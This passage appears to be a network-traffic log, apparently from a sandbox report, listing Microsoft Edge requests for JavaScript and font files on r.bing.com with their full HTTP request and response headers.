x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=358163
Expires: Wed, 09 Oct 2024 19:34:54 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a1777b5c.1728144331.2593e53
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/TjyWAmemrltxca9Tew0hTL__JHg.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/TjyWAmemrltxca9Tew0hTL__JHg.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 1218
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: 3+rYbha1WoVmHqd+xAo16Q==
Last-Modified: Tue, 24 Sep 2024 06:26:57 GMT
ETag: 0x8DCDC61E3F44079
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f8c87383-401e-0052-2adf-15f762000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=280228
Expires: Tue, 08 Oct 2024 21:55:59 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a1777b5c.1728144331.2593f3d
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/n21aGRCN5EKHB3qObygw029dyNU.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/n21aGRCN5EKHB3qObygw029dyNU.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 806
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: hRrTe9xFPcEQGLGPgVvjhw==
Last-Modified: Tue, 24 Sep 2024 06:57:19 GMT
ETag: 0x8DCDC66220B7293
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3ebc0f95-601e-0028-0205-169d2f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=296727
Expires: Wed, 09 Oct 2024 02:30:58 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a1777b5c.1728144331.259406d
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/gKwIRAF4fg7noG1zyeUz8x3Jdhc.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/gKwIRAF4fg7noG1zyeUz8x3Jdhc.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 492
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: rSmdN6tN5TS/1yEQ8Z6pNA==
Last-Modified: Tue, 24 Sep 2024 06:47:07 GMT
ETag: 0x8DCDC64B5831289
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 84887bc2-901e-0079-016b-1583da000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=230567
Expires: Tue, 08 Oct 2024 08:08:19 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a1777b5c.1728144332.259412a
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/awRIKLY04rWw5wNlVL186SolQSo.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/awRIKLY04rWw5wNlVL186SolQSo.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Content-MD5: yrT84kD84PN8304R0Pvg0w==
Last-Modified: Tue, 27 Aug 2024 19:59:59 GMT
ETag: 0x8DCC6D2D4C09C7D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d631388f-c01e-007e-54ef-f994eb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Content-Length: 7001
Cache-Control: public, no-transform, max-age=52952
Expires: Sun, 06 Oct 2024 06:48:04 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a1777b5c.1728144332.2594235
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rs/6s/ku/jnc,nj/cNbseG2vlUH2ubvgjbDJtgTzQPo.js?or=w

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rs/6s/ku/jnc,nj/cNbseG2vlUH2ubvgjbDJtgTzQPo.js?or=w HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 241
Content-Type: application/x-javascript; charset=utf-8
Server: Kestrel
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
Content-Encoding: br
Last-Modified: Tue, 16 Aug 2022 23:21:32 GMT
X-EventID: 66aa8aa971424f6b9c033a2852a83f6e
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
X-AS-InstrumentationOptions: AppServerLoggingMaster=1
X-AS-MACHINENAME: DUBEEAP0000E079
X-AS-SuppressSetCookie: 1
Content-Security-Policy-Report-Only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-vL3M6hS1OslHvvaW8puiJxvFliQamrtETWfuqQDFnWI='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
Cache-Control: public, max-age=98271
Expires: Sun, 06 Oct 2024 19:23:23 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a1777b5c.1728144332.25942ed
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/CcMXS8Oo0OUnUE0LzYK9AFJ6la8.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/CcMXS8Oo0OUnUE0LzYK9AFJ6la8.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 791
Content-Type: application/x-javascript; charset=utf-8
Content-Encoding: br
Content-MD5: rqa21C4TqvhBKaqsPZN5dA==
Last-Modified: Wed, 17 Aug 2022 05:27:07 GMT
ETag: 0x8DA801120BEDFE9
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e1075256-901e-005c-49b1-0251f4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=126484
Expires: Mon, 07 Oct 2024 03:13:36 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a1777b5c.1728144332.25943e6
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/N8R8Z3POBvxafKAbcSeJEMJBVYU.gz.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/N8R8Z3POBvxafKAbcSeJEMJBVYU.gz.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 1751
Content-Type: text/javascript; charset=utf-8
Content-Encoding: gzip
Content-MD5: R8ST8VQVqw31QdHepCJ87Q==
Last-Modified: Tue, 24 Sep 2024 06:16:25 GMT
ETag: 0x8DCDC606B4C7CD2
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 90f48d5a-301e-0074-03d6-156cd6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=276347
Expires: Tue, 08 Oct 2024 20:51:20 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a1777b5c.1728144333.25944e5
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/43BJuM7qM_8Wd1WfIZM2_oK9zrw.gz.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/43BJuM7qM_8Wd1WfIZM2_oK9zrw.gz.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 247
Content-Type: text/javascript; charset=utf-8
Content-Encoding: gzip
Content-MD5: 7JvW+NJmxA/Lpn4O+NJgxw==
Last-Modified: Mon, 01 May 2023 19:02:50 GMT
ETag: 0x8DB4A76A8FA2349
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f4019c94-501e-00a7-0fc5-f3ec6e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=140271
Expires: Mon, 07 Oct 2024 07:03:24 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a1777b5c.1728144333.2594c08
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/sa/simg/Roboto_Regular.woff2

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /sa/simg/Roboto_Regular.woff2 HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: font
Referer: https://r.bing.com/rs/5W/2VH/cir3,cc,nc/1KKUBDl-P5UnnMr4CFdIc4245kE.css?or=w
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 404 Not Found

Accept-Ranges: bytes
Content-Length: 10
Server: AkamaiNetStorage
Date: Sat, 05 Oct 2024 16:05:49 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a1777b5c.1728144349.2594cd8
GET

https://r.bing.com/sa/simg/Roboto_Semibold.woff2

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /sa/simg/Roboto_Semibold.woff2 HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: font
Referer: https://r.bing.com/rs/5W/2VH/cir3,cc,nc/1KKUBDl-P5UnnMr4CFdIc4245kE.css?or=w
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 404 Not Found

Accept-Ranges: bytes
Content-Length: 10
Server: AkamaiNetStorage
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a1777b5c.1728144350.259d09a
GET

https://r.bing.com/rp/xNXcmtdwycOn0MCvsFO8RJsXvi0.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/xNXcmtdwycOn0MCvsFO8RJsXvi0.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 1070
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: U/6Yl+Dtjm4MU/4JSVxpug==
Last-Modified: Sat, 31 Aug 2024 19:02:40 GMT
ETag: 0x8DCC9EF7C75108B
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ef8eef71-a01e-00c1-2f95-fea34e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=100100
Expires: Sun, 06 Oct 2024 19:54:10 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a1777b5c.1728144350.259d500
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/yZjAz6-B4hIBhJ6D3nAyY_Ebn44.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/yZjAz6-B4hIBhJ6D3nAyY_Ebn44.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 213
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: WEjo6St2+BsB3AUDglK12Q==
Last-Modified: Tue, 24 Sep 2024 07:15:09 GMT
ETag: 0x8DCDC689FBBE351
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 699ab76d-c01e-0061-662c-16ae4f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=313648
Expires: Wed, 09 Oct 2024 07:13:18 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a1777b5c.1728144350.259d601
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/y1tiMssL1_ZRGIkBjxDYmR2kX8o.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/y1tiMssL1_ZRGIkBjxDYmR2kX8o.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 146
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: Mu+4u1+ZO0orsL04es/kgA==
Last-Modified: Tue, 24 Sep 2024 07:14:32 GMT
ETag: 0x8DCDC688977670C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ff8235a8-e01e-001b-40a3-14c402000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=144553
Expires: Mon, 07 Oct 2024 08:15:03 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a1777b5c.1728144350.259d6e5
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/AJF0byxTDIdetV3TqxY9v12oeN8.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/AJF0byxTDIdetV3TqxY9v12oeN8.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 670
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: 0PLdAGr2NYkg9nvkR9neRA==
Last-Modified: Tue, 24 Sep 2024 05:56:18 GMT
ETag: 0x8DCDC5D9C26EE90
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c92a3c79-f01e-0069-11ad-16b53c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=369088
Expires: Wed, 09 Oct 2024 22:36:58 GMT
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9c777b5c.1728144330.22688208
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/B41j9eGM1DLNjQd-XrgY_sctGDk.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/B41j9eGM1DLNjQd-XrgY_sctGDk.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Content-MD5: VLeA+PwqwSD+v3fH/0ovUw==
Last-Modified: Wed, 17 Aug 2022 05:24:17 GMT
ETag: 0x8DA8010BB4E89F0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c3aa6745-b01e-0016-22e8-10f27b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Content-Length: 218
Cache-Control: public, no-transform, max-age=123366
Expires: Mon, 07 Oct 2024 02:21:37 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9c777b5c.1728144331.2268820e
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/T5889cz8zTrV7Rl2tlyjGriSuv0.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/T5889cz8zTrV7Rl2tlyjGriSuv0.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 150
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
